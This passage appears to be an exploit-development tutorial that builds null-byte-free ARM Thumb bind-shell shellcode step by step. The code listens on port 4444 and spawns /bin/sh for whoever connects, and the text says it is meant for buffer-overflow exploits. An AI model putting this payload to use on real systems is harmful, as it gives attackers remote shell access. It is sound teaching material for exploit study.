0 – Switch to Thumb Mode
The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In Arm mode, the instructions are 32-bit, in Thumb mode they are 16-bit. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4 byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register containing the address of the next instruction with the LSB set to one, which makes the processor switch to Thumb mode. It all boils down to the following two instructions.
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.
1 – Create new Socket
These are the values we need for the socket call parameters:
root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
/usr/include/linux/in.h: IPPROTO_IP = 0, // Dummy protocol for TCP
/usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1, // Sequenced, reliable, connection-based
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2 // IP protocol family.
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET
After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4.
In ARM, you can’t simply move any immediate value into a register. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).
To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.
pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 281
Sorry, 281 cannot be used as an immediate number and has to be split.
pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 200
The number 200 can be used as a valid immediate number.
50 ror 30 --> 200
pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 81
The number 81 can be used as a valid immediate number.
81 ror 0 --> 81
Final code snippet:
.THUMB
mov r0, #2
mov r1, #1
sub r2, r2, r2
mov r7, #200
add r7, #81 // r7 = 281 (socket syscall number)
svc #1 // r0 = host_sockid value
mov r4, r0 // save host_sockid in r4
2 – Bind Socket to Local Port
With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:
// bind(r0, &sockaddr, 16)
adr r1, struct_addr // pointer to address, port
[...]
struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed
.ascii "\x11\x5c" // port number 4444
.byte 1,1,1,1 // IP Address
The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset.
In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes.
Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.
For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution.
The first STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write.
The move instruction puts the length of the sockaddr_in structure length (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall.
// bind(r0, &sockaddr, 16)
adr r1, struct_addr // pointer to address, port
strb r2, [r1, #1] // write 0 for AF_INET
strb r2, [r1, #4] // replace 1 with 0 in x.1.1.1
strb r2, [r1, #5] // replace 1 with 0 in 0.x.1.1
strb r2, [r1, #6] // replace 1 with 0 in 0.0.x.1
strb r2, [r1, #7] // replace 1 with 0 in 0.0.0.x
mov r2, #16
add r7, #1 // r7 = 281+1 = 282 (bind syscall number)
svc #1
nop
3 – Listen for Incoming Connections
Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall.
mov r0, r4 // r0 = saved host_sockid
mov r1, #2
add r7, #2 // r7 = 284 (listen syscall number)
svc #1
4 – Accept Incoming Connection
Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we use don’t directly move #0 into r1 and r2, but instead, set them to 0 by subtracting them from each other. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code).
mov r0, r4 // r0 = saved host_sockid
sub r1, r1, r1 // clear r1, r1 = 0
sub r2, r2, r2 // clear r2, r2 = 0
add r7, #1 // r7 = 285 (accept syscall number)
svc #1
mov r4, r0 // save result (client_sockid) in r4
5 – STDIN, STDOUT, STDERR
For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call.
/* dup2(client_sockid, 0) */
mov r7, #63 // r7 = 63 (dup2 syscall number)
mov r0, r4 // r4 is the saved client_sockid
sub r1, r1, r1 // r1 = 0 (stdin)
svc #1
/* dup2(client_sockid, 1) */
mov r0, r4 // r4 is the saved client_sockid
add r1, #1 // r1 = 1 (stdout)
svc #1
/* dup2(client_sockid, 2) */
mov r0, r4 // r4 is the saved client_sockid
add r1, #1 // r1 = 1+1 (stderr)
svc #1
6 – Spawn the Shell
// execve("/bin/sh", 0, 0)
adr r0, shellcode // r0 = location of "/bin/shX"
eor r1, r1, r1 // clear register r1. R1 = 0
eor r2, r2, r2 // clear register r2. r2 = 0
strb r2, [r0, #7] // store null-byte for AF_INET
mov r7, #11 // execve syscall number
svc #1
nop
The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.
Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.
struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed
.ascii "\x11\x5c" // port number 4444
.byte 1,1,1,1 // IP Address
shellcode:
.ascii "/bin/shX"